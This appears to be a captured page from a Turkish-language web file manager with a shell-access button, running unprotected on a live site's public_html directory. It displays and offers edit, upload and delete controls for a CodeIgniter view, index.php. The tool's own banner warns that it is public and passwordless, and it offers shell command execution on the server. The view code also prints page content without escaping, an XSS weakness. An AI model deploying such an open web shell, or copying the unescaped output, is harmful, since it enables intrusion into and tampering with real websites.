⚠️ **YÜKSEK GÜVENLİK RİSKİ:** Bu dosya herkese açık ve şifresizdir. Lütfen sadece **yerel ortamınızda** kullanın ve işiniz bittiğinde **silin**.
Aktif Dizin:
/home/dltain/public_html/app/Views/matchs
Dosya Düzenle: index.php
<?= $this->extend('layout/main') ?> <?= $this->section('breadcumb') ?> <div class="breadcumb-wrapper" data-bg-src="<?php if (base_url('uploads/'.$content['heading_image'])) { echo base_url('uploads/'.$content['heading_image']); } ?>" data-overlay="black" data-opacity="7"> <div class="container"> <div class="breadcumb-content text-center"> <h1 class="breadcumb-title"><?= $content['heading'] ?></h1> <ul class="breadcumb-menu"> <li><a href="<?= base_url() ?>">Home</a></li> <li><?= $content['heading'] ?></li> </ul> </div> </div> </div> <?= $this->endSection() ?> <?= $this->section('content') ?> <h2> <?php echo $content['heading']; ?> </h2> <?php echo htmlspecialchars_decode($content['contents']); ?> <p> <?php if($content['img']):?> <a href="<?= base_url('uploads/'.$content['img']) ?>"> <?php if(file_exists(base_url('uploads/'.$content['img']))) { ?> <img src="<?= base_url('uploads/'.$content['img']) ?>" height="100" alt="Click For Download"> <?php }else{ ?> Click For Download <?php } ?> </a> <?php endif; ?> </p> <?= $this->endSection() ?>
Değişiklikleri Kaydet
Yeni Dosya Yükle (Mevcut Dizine)
Yükle
Adı
Tipi
Boyut
İşlemler
📁
.. (Üst Dizin)
📄 index.php
Dosya
1.18 KB
Düzenle
Sil
Sorun Giderme (Shell Erişimi)
Çalıştır